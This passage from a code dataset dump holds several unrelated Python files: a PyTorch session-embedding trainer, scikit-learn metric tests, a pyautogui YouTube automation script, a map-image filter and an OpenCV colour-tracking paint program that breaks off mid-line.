unfinished_sequences.max() == 0 or stopping_criteria(input_ids, scores):\n break\n yield input_ids","repo_name":"Rhine-AI-Lab/KW-General","sub_path":"cutegpt-inference/test/stream_generate.py","file_name":"stream_generate.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39800119248","text":"import pytorch_lightning as pl\nimport torch\n\n\nclass SessionTrainer(pl.LightningModule):\n\n def __init__(self, dataset, n_users, n_events, test_dataset=None, embed_dim=128, batch_size=128, learning_rate=1e-2,\n padding_idx=0, session_size=10, hidden_dim=128, time_norm=False):\n super(SessionTrainer, self).__init__()\n self.dataset = dataset\n self.test_dataset = test_dataset if test_dataset is not None else dataset\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.session_size = session_size\n\n self.user_embed = torch.nn.Embedding(num_embeddings=n_users, embedding_dim=embed_dim, padding_idx=padding_idx,\n max_norm=1)\n self.event_embed = torch.nn.Embedding(num_embeddings=n_events, embedding_dim=embed_dim, padding_idx=padding_idx,\n max_norm=1)\n\n self.hidden_dim = hidden_dim\n self.time_dim = hidden_dim // 4\n self.time_norm = time_norm\n if time_norm:\n self.time_layers = torch.nn.ModuleList([\n torch.nn.Linear(self.time_dim, hidden_dim),\n torch.nn.Linear(hidden_dim, 1)\n ])\n\n def get_time_encoding(self, t, max_time=60 * 60):\n powers = max_time ** (2 / self.time_dim * torch.arange(self.time_dim // 2).type_as(t))\n invert_powers = 1 / powers\n x = torch.matmul(t.unsqueeze(-1), invert_powers.unsqueeze(0))\n x = torch.cat([torch.sin(x), torch.cos(x)], dim=-1)\n if self.time_dim % 2 == 1:\n x = torch.nn.functional.pad(x, pad=(0, 1), value=0)\n return x\n\n def build_context(self, events_embed, times=None):\n # get context vector from events b (1+neg) d\n if self.time_norm and times is not None:\n times_embed = self.get_time_encoding(times)\n weights = self.time_layers[1](torch.nn.functional.silu(self.time_layers[0](times_embed)))\n weights = torch.softmax(weights, dim=-2)\n return (weights * events_embed).sum(dim=-2)\n else:\n return torch.mean(events_embed, dim=-2)\n\n def pred(self, events, times=None):\n\n users_embed = self.user_embed(torch.arange(self.user_embed.num_embeddings).type_as(events)) # u d\n events_embed = self.build_context(self.event_embed(events), times) # b d\n\n preds = torch.softmax(torch.sum(users_embed.unsqueeze(0) * events_embed.unsqueeze(1), dim=-1), dim=-1)\n\n return preds # b u\n\n def forward(self, users, events, times=None):\n users_embed = self.user_embed(users) # b d\n events_embed = self.event_embed(events) # b (1+neg) t d\n events_embed = self.build_context(events_embed, times)\n # do scalar product of user (b 1 d) with session embed (b (1+neg) d)\n preds = torch.softmax(torch.sum(users_embed.unsqueeze(-2) * events_embed, dim=-1), dim=-1)\n\n return preds\n\n def step(self, batch):\n\n preds = self.forward(batch['users'], batch['events'], batch['times'])\n\n return {\n # in every batch zero user is a true class\n 'loss': torch.nn.functional.cross_entropy(preds, torch.zeros(len(preds)).type_as(batch['events'])),\n 'preds': preds\n }\n\n def training_step(self, batch, batch_idx):\n loss = self.step(batch)\n self.log(f'train_loss', loss['loss'], prog_bar=True, sync_dist=True)\n\n return loss['loss']\n\n def validation_step(self, batch, batch_idx):\n loss = self.step(batch)\n self.log(f'val_loss', loss['loss'], prog_bar=True, sync_dist=True)\n\n events = batch['events'][:, 0]\n times = batch['times'][:, 0]\n true_users = batch['users']\n\n preds = self.pred(events, times)\n pred_ids = torch.argmax(preds, dim=-1)\n\n accuracy = (true_users == pred_ids).float().mean()\n self.log(f'val_accuracy', accuracy, prog_bar=True, sync_dist=True)\n\n def configure_optimizers(self):\n params = list(self.user_embed.parameters()) + list(self.event_embed.parameters())\n if self.time_norm:\n params += list(self.time_layers.parameters())\n optimizer = torch.optim.SGD(lr=self.learning_rate, params=params)\n return optimizer\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(self.dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=max((2 * torch.cuda.device_count(), 2)),\n pin_memory=False, prefetch_factor=1)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(self.test_dataset, batch_size=self.batch_size, shuffle=False,\n num_workers=max((2 * torch.cuda.device_count(), 2)),\n pin_memory=False, prefetch_factor=1)\n","repo_name":"sthfaceless/explore","sub_path":"modules/nlp/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12414875530","text":"from figpptx import transcribe, rasterize\nfrom figpptx import pptx_misc\nfrom figpptx import image_misc\nfrom figpptx import artist_misc\n\n\nclass Comparer:\n \"\"\"Compare the result of ``rasterize`` and ``transcribe``.\n Mainly, it is used for checking behaviors to\n develop ``converters`` for ``PPTXTranscriber``.\n \"\"\"\n\n def __init__(self, slide=None):\n self._slide = slide\n\n @property\n def slide(self):\n return pptx_misc.get_slide(self._slide)\n\n def compare(self, artist):\n \"\"\"Args:\"\"\"\n fig = artist_misc.to_figure(artist)\n fig.set_dpi(72)\n slide_size = pptx_misc.get_slide_size(self.slide)\n\n # To know the size of image proactively.\n image = image_misc.to_image(artist)\n left1, top1, left2, top2 = _decide_positions(slide_size, image.size)\n\n rasterize(artist, slide=self.slide, left=left1, top=top1)\n transcribe(artist, slide=self.slide, left=left2, top=top2)\n\n\ndef _decide_positions(slide_size, image_size):\n slide_width, slide_height = slide_size\n image_width, image_height = image_size\n width_margin = (slide_width / 2 - image_width) / 2\n height_margin = (slide_height - image_height) / 2\n width_margin = max(0, width_margin)\n height_margin = max(0, height_margin)\n\n left1, top1 = width_margin, height_margin\n left2, top2 = slide_width / 2 + width_margin, height_margin\n return left1, top1, left2, top2\n","repo_name":"Sillte/figpptx","sub_path":"figpptx/comparer.py","file_name":"comparer.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9656587031","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n min_len = min(len(word1), len(word2))\n\n buildup = ''\n for i in range(min_len):\n buildup += word1[i]\n buildup += word2[i]\n \n if len(word1) < len(word2):\n buildup += word2[min_len:] \n else:\n buildup += word1[min_len:] \n return buildup","repo_name":"cphung3/leetcode-solutions","sub_path":"Interview 150/Array - String/1768. Merge Strings Alternately.py","file_name":"1768. Merge Strings Alternately.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1869378729","text":"import random\nimport numpy as np\n\nfrom nose.tools import raises\nfrom nose.tools import assert_true, assert_raises\nfrom numpy.testing import assert_array_almost_equal\nfrom numpy.testing import assert_array_equal\nfrom numpy.testing import assert_equal, assert_almost_equal\n\nfrom ... import datasets\nfrom ... import svm\nfrom ..metrics import auc\nfrom ..metrics import classification_report\nfrom ..metrics import confusion_matrix\nfrom ..metrics import explained_variance_score\nfrom ..metrics import r2_score\nfrom ..metrics import f1_score\nfrom ..metrics import matthews_corrcoef\nfrom ..metrics import mean_squared_error\nfrom ..metrics import precision_recall_curve\nfrom ..metrics import precision_recall_fscore_support\nfrom ..metrics import precision_score\nfrom ..metrics import recall_score\nfrom ..metrics import roc_curve\nfrom ..metrics import auc_score\nfrom ..metrics import average_precision_score\nfrom ..metrics import zero_one\nfrom ..metrics import hinge_loss\n\n\ndef make_prediction(dataset=None, binary=False):\n \"\"\"Make some classification predictions on a toy dataset using a SVC\n\n If binary is True restrict to a binary classification problem instead of a\n multiclass classification problem\n \"\"\"\n\n if dataset is None:\n # import some data to play with\n dataset = datasets.load_iris()\n\n X = dataset.data\n y = dataset.target\n\n if binary:\n # restrict to a binary classification task\n X, y = X[y < 2], y[y < 2]\n\n n_samples, n_features = X.shape\n p = range(n_samples)\n\n random.seed(0)\n random.shuffle(p)\n X, y = X[p], y[p]\n half = int(n_samples / 2)\n\n # add noisy features to make the problem harder and avoid perfect results\n rng = np.random.RandomState(0)\n X = np.c_[X, rng.randn(n_samples, 200 * n_features)]\n\n # run classifier, get class probabilities and label predictions\n clf = svm.SVC(kernel='linear', probability=True)\n probas_pred = clf.fit(X[:half], y[:half]).predict_proba(X[half:])\n\n if binary:\n # only interested in probabilities of the positive case\n # XXX: do we really want a special API for the binary case?\n probas_pred = probas_pred[:, 1]\n\n y_pred = clf.predict(X[half:])\n y_true = y[half:]\n return y_true, y_pred, probas_pred\n\n\ndef test_roc_curve():\n \"\"\"Test Area under Receiver Operating Characteristic (ROC) curve\"\"\"\n y_true, _, probas_pred = make_prediction(binary=True)\n\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.80, decimal=2)\n assert_almost_equal(roc_auc, auc_score(y_true, probas_pred))\n\n\ndef test_roc_returns_consistency():\n \"\"\"Test whether the returned threshold matches up with tpr\"\"\"\n # make small toy dataset\n y_true, _, probas_pred = make_prediction(binary=True)\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred)\n\n # use the given thresholds to determine the tpr\n tpr_correct = []\n for t in range(len(thresholds)):\n tp = np.sum((probas_pred >= thresholds[t]) & y_true)\n p = np.sum(y_true)\n tpr_correct.append(1.0 * tp / p)\n\n # compare tpr and tpr_correct to see if the thresholds' order was correct\n assert_array_almost_equal(tpr, tpr_correct, decimal=2)\n\n\n@raises(ValueError)\ndef test_roc_curve_multi():\n \"\"\"roc_curve not applicable for multi-class problems\"\"\"\n y_true, _, probas_pred = make_prediction(binary=False)\n\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred)\n\n\ndef test_roc_curve_confidence():\n \"\"\"roc_curve for confidence scores\"\"\"\n y_true, _, probas_pred = make_prediction(binary=True)\n\n fpr, tpr, thresholds = roc_curve(y_true, probas_pred - 0.5)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.80, decimal=2)\n\n\ndef test_roc_curve_hard():\n \"\"\"roc_curve for hard decisions\"\"\"\n y_true, pred, probas_pred = make_prediction(binary=True)\n\n # always predict one\n trivial_pred = np.ones(y_true.shape)\n fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.50, decimal=2)\n\n # always predict zero\n trivial_pred = np.zeros(y_true.shape)\n fpr, tpr, thresholds = roc_curve(y_true, trivial_pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.50, decimal=2)\n\n # hard decisions\n fpr, tpr, thresholds = roc_curve(y_true, pred)\n roc_auc = auc(fpr, tpr)\n assert_array_almost_equal(roc_auc, 0.74, decimal=2)\n\n\ndef test_auc():\n \"\"\"Test Area Under Curve (AUC) computation\"\"\"\n x = [0, 1]\n y = [0, 1]\n assert_array_almost_equal(auc(x, y), 0.5)\n x = [1, 0]\n y = [0, 1]\n assert_array_almost_equal(auc(x, y), 0.5)\n x = [0, 1]\n y = [1, 1]\n assert_array_almost_equal(auc(x, y), 1)\n x = [0, 0.5, 1]\n y = [0, 0.5, 1]\n assert_array_almost_equal(auc(x, y), 0.5)\n\n\ndef test_auc_duplicate_values():\n \"\"\"Test Area Under Curve (AUC) computation with duplicate values\n\n auc() was previously sorting the x and y arrays according to the indices\n from numpy.argsort(x), which was reordering the tied 0's in this example\n and resulting in an incorrect area computation. This test detects the\n error.\n \"\"\"\n x = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.5, 1.]\n y = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9,\n 1., 1., 1., 1., 1., 1., 1., 1.]\n assert_array_almost_equal(auc(x, y), 1.)\n\n\ndef test_precision_recall_f1_score_binary():\n \"\"\"Test Precision Recall and F1 Score for binary classification task\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n\n # detailed measures for each class\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n assert_array_almost_equal(p, [0.73, 0.75], 2)\n assert_array_almost_equal(r, [0.76, 0.72], 2)\n assert_array_almost_equal(f, [0.75, 0.74], 2)\n assert_array_equal(s, [25, 25])\n\n # individual scoring function that can be used for grid search: in the\n # binary class case the score is the value of the measure for the positive\n # class (e.g. label == 1)\n ps = precision_score(y_true, y_pred)\n assert_array_almost_equal(ps, 0.75, 2)\n\n rs = recall_score(y_true, y_pred)\n assert_array_almost_equal(rs, 0.72, 2)\n\n fs = f1_score(y_true, y_pred)\n assert_array_almost_equal(fs, 0.74, 2)\n\n\ndef test_confusion_matrix_binary():\n \"\"\"Test confusion matrix - binary classification case\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n\n cm = confusion_matrix(y_true, y_pred)\n assert_array_equal(cm, [[19, 6], [7, 18]])\n\n tp = cm[0, 0]\n tn = cm[1, 1]\n fp = cm[0, 1]\n fn = cm[1, 0]\n num = (tp * tn - fp * fn)\n den = np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))\n if den == 0.:\n true_mcc = 0\n else:\n true_mcc = num / den\n mcc = matthews_corrcoef(y_true, y_pred)\n assert_array_almost_equal(mcc, true_mcc, decimal=2)\n assert_array_almost_equal(mcc, 0.48, decimal=2)\n\n\ndef test_precision_recall_f1_score_multiclass():\n \"\"\"Test Precision Recall and F1 Score for multiclass classification task\"\"\"\n y_true, y_pred, _ = make_prediction(binary=False)\n\n # compute scores with default labels introspection\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n assert_array_almost_equal(p, [0.82, 0.55, 0.47], 2)\n assert_array_almost_equal(r, [0.92, 0.17, 0.90], 2)\n assert_array_almost_equal(f, [0.87, 0.26, 0.62], 2)\n assert_array_equal(s, [25, 30, 20])\n\n # averaging tests\n ps = precision_score(y_true, y_pred, pos_label=1, average='micro')\n assert_array_almost_equal(ps, 0.61, 2)\n\n rs = recall_score(y_true, y_pred, average='micro')\n assert_array_almost_equal(rs, 0.61, 2)\n\n fs = f1_score(y_true, y_pred, average='micro')\n assert_array_almost_equal(fs, 0.61, 2)\n\n ps = precision_score(y_true, y_pred, average='macro')\n assert_array_almost_equal(ps, 0.62, 2)\n\n rs = recall_score(y_true, y_pred, average='macro')\n assert_array_almost_equal(rs, 0.66, 2)\n\n fs = f1_score(y_true, y_pred, average='macro')\n assert_array_almost_equal(fs, 0.58, 2)\n\n ps = precision_score(y_true, y_pred, average='weighted')\n assert_array_almost_equal(ps, 0.62, 2)\n\n rs = recall_score(y_true, y_pred, average='weighted')\n assert_array_almost_equal(rs, 0.61, 2)\n\n fs = f1_score(y_true, y_pred, average='weighted')\n assert_array_almost_equal(fs, 0.55, 2)\n\n # same prediction but with and explicit label ordering\n p, r, f, s = precision_recall_fscore_support(\n y_true, y_pred, labels=[0, 2, 1], average=None)\n assert_array_almost_equal(p, [0.82, 0.47, 0.55], 2)\n assert_array_almost_equal(r, [0.92, 0.90, 0.17], 2)\n assert_array_almost_equal(f, [0.87, 0.62, 0.26], 2)\n assert_array_equal(s, [25, 20, 30])\n\n\ndef test_zero_precision_recall():\n \"\"\"Check that pathological cases do not bring NaNs\"\"\"\n\n try:\n old_error_settings = np.seterr(all='raise')\n\n y_true = np.array([0, 1, 2, 0, 1, 2])\n y_pred = np.array([2, 0, 1, 1, 2, 0])\n\n assert_almost_equal(precision_score(y_true, y_pred,\n average='weighted'), 0.0, 2)\n assert_almost_equal(recall_score(y_true, y_pred, average='weighted'),\n 0.0, 2)\n assert_almost_equal(f1_score(y_true, y_pred, average='weighted'),\n 0.0, 2)\n\n finally:\n np.seterr(**old_error_settings)\n\n\ndef test_confusion_matrix_multiclass():\n \"\"\"Test confusion matrix - multi-class case\"\"\"\n y_true, y_pred, _ = make_prediction(binary=False)\n\n # compute confusion matrix with default labels introspection\n cm = confusion_matrix(y_true, y_pred)\n assert_array_equal(cm, [[23, 2, 0],\n [5, 5, 20],\n [0, 2, 18]])\n\n # compute confusion matrix with explicit label ordering\n cm = confusion_matrix(y_true, y_pred, labels=[0, 2, 1])\n assert_array_equal(cm, [[23, 0, 2],\n [0, 18, 2],\n [5, 20, 5]])\n\n\ndef test_classification_report():\n \"\"\"Test performance report\"\"\"\n iris = datasets.load_iris()\n y_true, y_pred, _ = make_prediction(dataset=iris, binary=False)\n\n # print classification report with class names\n expected_report = \"\"\"\\\n precision recall f1-score support\n\n setosa 0.82 0.92 0.87 25\n versicolor 0.56 0.17 0.26 30\n virginica 0.47 0.90 0.62 20\n\navg / total 0.62 0.61 0.56 75\n\"\"\"\n report = classification_report(\n y_true, y_pred, labels=range(len(iris.target_names)),\n target_names=iris.target_names)\n assert_equal(report, expected_report)\n\n # print classification report with label detection\n expected_report = \"\"\"\\\n precision recall f1-score support\n\n 0 0.82 0.92 0.87 25\n 1 0.56 0.17 0.26 30\n 2 0.47 0.90 0.62 20\n\navg / total 0.62 0.61 0.56 75\n\"\"\"\n report = classification_report(y_true, y_pred)\n assert_equal(report, expected_report)\n\n\ndef test_precision_recall_curve():\n \"\"\"Test Precision-Recall and aread under PR curve\"\"\"\n y_true, _, probas_pred = make_prediction(binary=True)\n\n p, r, thresholds = precision_recall_curve(y_true, probas_pred)\n precision_recall_auc = auc(r, p)\n assert_array_almost_equal(precision_recall_auc, 0.82, 2)\n assert_array_almost_equal(precision_recall_auc,\n average_precision_score(y_true, probas_pred))\n # Smoke test in the case of proba having only one value\n p, r, thresholds = precision_recall_curve(y_true,\n np.zeros_like(probas_pred))\n precision_recall_auc = auc(r, p)\n assert_array_almost_equal(precision_recall_auc, 0.75, 3)\n\n\ndef test_losses():\n \"\"\"Test loss functions\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n n = y_true.shape[0]\n\n assert_equal(zero_one(y_true, y_pred), 13)\n assert_almost_equal(mean_squared_error(y_true, y_pred), 12.999 / n, 2)\n assert_almost_equal(mean_squared_error(y_true, y_true), 0.00, 2)\n\n assert_almost_equal(explained_variance_score(y_true, y_pred), -0.04, 2)\n assert_almost_equal(explained_variance_score(y_true, y_true), 1.00, 2)\n\n assert_almost_equal(r2_score(y_true, y_pred), -0.04, 2)\n assert_almost_equal(r2_score(y_true, y_true), 1.00, 2)\n\n\ndef test_losses_at_limits():\n # test limit cases\n assert_almost_equal(mean_squared_error([0.], [0.]), 0.00, 2)\n assert_almost_equal(explained_variance_score([0.], [0.]), 1.00, 2)\n assert_almost_equal(r2_score([0., 1], [0., 1]), 1.00, 2)\n\n\ndef test_r2_one_case_error():\n # test whether r2_score raises error given one point\n assert_raises(ValueError, r2_score, [0], [0])\n\n\ndef test_symmetry():\n \"\"\"Test the symmetry of score and loss functions\"\"\"\n y_true, y_pred, _ = make_prediction(binary=True)\n\n # symmetric\n assert_equal(zero_one(y_true, y_pred),\n zero_one(y_pred, y_true))\n assert_almost_equal(mean_squared_error(y_true, y_pred),\n mean_squared_error(y_pred, y_true))\n # not symmetric\n assert_true(explained_variance_score(y_true, y_pred) != \\\n explained_variance_score(y_pred, y_true))\n assert_true(r2_score(y_true, y_pred) != \\\n r2_score(y_pred, y_true))\n # FIXME: precision and recall aren't symmetric either\n\n\ndef test_hinge_loss_binary():\n y_true = np.array([-1, 1, 1, -1])\n pred_decision = np.array([-8.5, 0.5, 1.5, -0.3])\n assert_equal(1.2 / 4, hinge_loss(y_true, pred_decision))\n\n y_true = np.array([0, 2, 2, 0])\n pred_decision = np.array([-8.5, 0.5, 1.5, -0.3])\n assert_equal(1.2 / 4,\n hinge_loss(y_true, pred_decision, pos_label=2, neg_label=0))\n","repo_name":"jkitzes/batid","sub_path":"src/xsklearn/metrics/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":13916,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31220232283","text":"import pyautogui as robot\nimport time\n#pyautogui.moveTo(X, Y, Seconds)\n\nlista_canciones=['eamon','vocales']\ngoogle=123,44\nmax=1308,13\ndireccion=179,52\nbuscar=372,130\ncancion=467,290\nexit=1347,11\n\n\n\n#función para abrir\ndef abrir(pos,click=1):\n robot.moveTo(pos)\n robot.click(clicks=click)\n\n#abrir chrome\nabrir(google,click=2)\n\n#configurar tamaño de pantalla\ntime.sleep(2)\nrobot.hotkey(\"alt\",\"space\")\ntime.sleep(0.5)\nrobot.typewrite(\"x\")\n\n#ubicarme en el buscador\ntime.sleep(4)\nabrir(direccion)\nrobot.typewrite(\"www.youtube.com\")\nrobot.hotkey(\"enter\")\ntime.sleep(4)\n\n#elegir cancion\n\nfor i in range(len(lista_canciones)):\n abrir(buscar,click=3)\n robot.typewrite(lista_canciones[i])\n robot.hotkey(\"enter\")\n time.sleep(2)\n abrir(cancion)\n time.sleep(5)\n\nabrir(exit)\nprint(\"Finish\")\n\n\n\n\n\n\n\n\n\n","repo_name":"gvielza/rpa-python-musica","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30244862488","text":"import pandas as pd\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom time import sleep\r\nfrom datetime import datetime\r\nfrom PIL import Image\r\nimport os\r\nimport numpy as np\r\n\r\nstarttime = datetime.now()\r\nRegion = \"LA\"\r\ninputfile = f'{Region}_lat_long.xlsx'\r\noutputfolder = f'D:\\\\Maps\\\\{Region}\\\\'\r\nresult_df = []\r\noutputfile = outputfolder + f'{Region}_lat_long_filtered.xlsx'\r\nlat_long = pd.read_excel(inputfile)\r\nlat = lat_long['Latitude'].values.tolist()\r\nlon = lat_long['Longitude'].values.tolist()\r\nfor i in range(len(lat)):\r\n try:\r\n apple_image = outputfolder + f'({lat[i]}{lon[i]})apple_image.png'\r\n google_image = outputfolder + f'({lat[i]}{lon[i]})google_image.png'\r\n # sleep(5)\r\n print(apple_image)\r\n print(google_image)\r\n img = Image.open(apple_image)\r\n img = img.convert(\"RGB\")\r\n co_ordinates = [(59, 13), (59, 19), (108,13), (108,19), (113, 13), (113, 19), (124,15)]\r\n flag = False\r\n for co_ordinate in co_ordinates:\r\n co_ordinate_tuple = img.getpixel(co_ordinate)\r\n if co_ordinate_tuple != (72, 69, 65):\r\n flag = True\r\n break\r\n\r\n print(flag)\r\n if flag == True:\r\n os.remove(apple_image)\r\n os.remove(google_image)\r\n else:\r\n temp = pd.DataFrame({'Latitude': str(lat[i]), 'Longitude': str(lon[i])}, index=[0])\r\n result_df.append(temp)\r\n except:\r\n continue\r\nif len(result_df) > 0:\r\n result_df = pd.concat(result_df, ignore_index=True)\r\n result_df.insert(loc=0, column='S.No', value=np.arange(1, len(result_df) + 1))\r\n result_df.to_excel(outputfile, index=False)\r\n# driver.quit()\r\nendtime = datetime.now()\r\ndiff = endtime - starttime\r\nprint(diff.seconds)","repo_name":"rrakzz/Maps","sub_path":"applemaps_extraction_images.py","file_name":"applemaps_extraction_images.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12036362847","text":"import numpy as np\nimport cv2\nfrom collections import deque\n\n# Викликаємо функцію трекбара\ndef setValues(x):\n print(\"\")\n\n\n# Створення трекбарів, необхідних для налаштування кольору маркера\ncv2.namedWindow(\"Color detectors\")\ncv2.createTrackbar(\"Upper Hue\", \"Color detectors\", 153, 180,setValues)\ncv2.createTrackbar(\"Upper Saturation\", \"Color detectors\", 255, 255,setValues)\ncv2.createTrackbar(\"Upper Value\", \"Color detectors\", 255, 255,setValues)\ncv2.createTrackbar(\"Lower Hue\", \"Color detectors\", 64, 180,setValues)\ncv2.createTrackbar(\"Lower Saturation\", \"Color detectors\", 72, 255,setValues)\ncv2.createTrackbar(\"Lower Value\", \"Color detectors\", 49, 255,setValues)\n\n\n# Надання різних масивів для обробки кольорових точок різного кольору\nbpoints = [deque(maxlen=1024)]\ngpoints = [deque(maxlen=1024)]\nrpoints = [deque(maxlen=1024)]\nypoints = [deque(maxlen=1024)]\n\n# Ці індекси будуть використовуватися для позначення точок у конкретних масивах певного кольору\nblue_index = 0\ngreen_index = 0\nred_index = 0\nyellow_index = 0\n\n#Ядро, яке буде використовуватися для розширення \nkernel = np.ones((5,5),np.uint8)\n\ncolors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (0, 255, 255)]\ncolorIndex = 0\n\n# Код полотна \npaintWindow = np.zeros((471,636,3)) + 255\npaintWindow = cv2.rectangle(paintWindow, (40,1), (140,65), (0,0,0), 2)\npaintWindow = cv2.rectangle(paintWindow, (160,1), (255,65), colors[0], -1)\npaintWindow = cv2.rectangle(paintWindow, (275,1), (370,65), colors[1], -1)\npaintWindow = cv2.rectangle(paintWindow, (390,1), (485,65), colors[2], -1)\npaintWindow = cv2.rectangle(paintWindow, (505,1), (600,65), colors[3], -1)\n\ncv2.putText(paintWindow, \"CLEAR\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\ncv2.putText(paintWindow, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150,150,150), 2, cv2.LINE_AA)\ncv2.namedWindow('Paint', cv2.WINDOW_AUTOSIZE)\n\n\n# Камера\ncap = cv2.VideoCapture(0)\n\n\nwhile True:\n # Зчитування кадру з камери\n ret, frame = cap.read()\n # Перевертаємо рамку, щоб побачити ту саму сторону\n frame = cv2.flip(frame, 1)\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n\n u_hue = cv2.getTrackbarPos(\"Upper Hue\", \"Color detectors\")\n u_saturation = cv2.getTrackbarPos(\"Upper Saturation\", \"Color detectors\")\n u_value = cv2.getTrackbarPos(\"Upper Value\", \"Color detectors\")\n l_hue = cv2.getTrackbarPos(\"Lower Hue\", \"Color detectors\")\n l_saturation = cv2.getTrackbarPos(\"Lower Saturation\", \"Color detectors\")\n l_value = cv2.getTrackbarPos(\"Lower Value\", \"Color detectors\")\n Upper_hsv = np.array([u_hue,u_saturation,u_value])\n Lower_hsv = np.array([l_hue,l_saturation,l_value])\n\n\n # Додавання кольорових кнопок до живого кадру для доступу до кольору\n frame = cv2.rectangle(frame, (40,1), (140,65), (122,122,122), -1)\n frame = cv2.rectangle(frame, (160,1), (255,65), colors[0], -1)\n frame = cv2.rectangle(frame, (275,1), (370,65), colors[1], -1)\n frame = cv2.rectangle(frame, (390,1), (485,65), colors[2], -1)\n frame = cv2.rectangle(frame, (505,1), (600,65), colors[3], -1)\n cv2.putText(frame, \"CLEAR ALL\", (49, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.putText(frame, \"BLUE\", (185, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.putText(frame, \"GREEN\", (298, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.putText(frame, \"RED\", (420, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.putText(frame, \"YELLOW\", (520, 33), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (150,150,150), 2, cv2.LINE_AA)\n\n\n # Ідентифікація покажчика шляхом створення його маски\n Mask = cv2.inRange(hsv, Lower_hsv, Upper_hsv)\n Mask = cv2.erode(Mask, kernel, iterations=1)\n Mask = cv2.morphologyEx(Mask, cv2.MORPH_OPEN, kernel)\n Mask = cv2.dilate(Mask, kernel, iterations=1)\n\n # Знаходимо контури для покажчика після його ідентифікації\n cnts,_ = cv2.findContours(Mask.copy(), cv2.RETR_EXTERNAL,\n \tcv2.CHAIN_APPROX_SIMPLE)\n center = None\n\n # Якщо формуються контури\n if len(cnts) > 0:\n \t# сортування контурів, щоб знайти найбільший\n cnt = sorted(cnts, key = cv2.contourArea, reverse = True)[0]\n # Отримуємо радіус охоплюючого кола навколо знайденого контуру\n ((x, y), radius) = cv2.minEnclosingCircle(cnt)\n # Намалюємо коло по контуру\n cv2.circle(frame, (int(x), int(y)), int(radius), (0, 255, 255), 2)\n # Обчислення центру виявленого контуру\n M = cv2.moments(cnt)\n center = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))\n\n # Перевірка, чи хоче користувач натиснути будь-яку кнопку над екраном\n if center[1] <= 65:\n if 40 <= center[0] <= 140: # Очистка\n bpoints = [deque(maxlen=512)]\n gpoints = [deque(maxlen=512)]\n rpoints = [deque(maxlen=512)]\n ypoints = [deque(maxlen=512)]\n\n blue_index = 0\n green_index = 0\n red_index = 0\n yellow_index = 0\n\n paintWindow[67:,:,:] = 255\n elif 160 <= center[0] <= 255:\n colorIndex = 0 # Синій\n elif 275 <= center[0] <= 370:\n colorIndex = 1 # Зелений\n elif 390 <= center[0] <= 485:\n colorIndex = 2 # Червоний\n elif 505 <= center[0] <= 600:\n colorIndex = 3 # Жовтий \n else :\n if colorIndex == 0:\n bpoints[blue_index].appendleft(center)\n elif colorIndex == 1:\n 